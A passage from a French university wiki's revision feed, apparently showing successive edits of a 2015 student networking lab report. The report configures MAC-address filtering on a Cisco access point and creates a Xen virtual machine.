&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22518</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22518"/>
				<updated>2015-10-28T08:16:05Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22516</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22516"/>
				<updated>2015-10-28T07:04:33Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22492</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22492"/>
				<updated>2015-10-27T11:12:57Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# ifconfig&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22491</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22491"/>
				<updated>2015-10-27T11:11:58Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22490</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22490"/>
				<updated>2015-10-27T11:11:17Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22489</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22489"/>
				<updated>2015-10-27T11:09:45Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22488</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22488"/>
				<updated>2015-10-27T11:09:29Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22487</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22487"/>
				<updated>2015-10-27T11:09:00Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22486</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22486"/>
				<updated>2015-10-27T11:08:20Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : Page créée avec « &amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt; &amp;lt;br /&amp;gt; &amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;  &amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4... »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Réalisation en monôme : Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	</feed>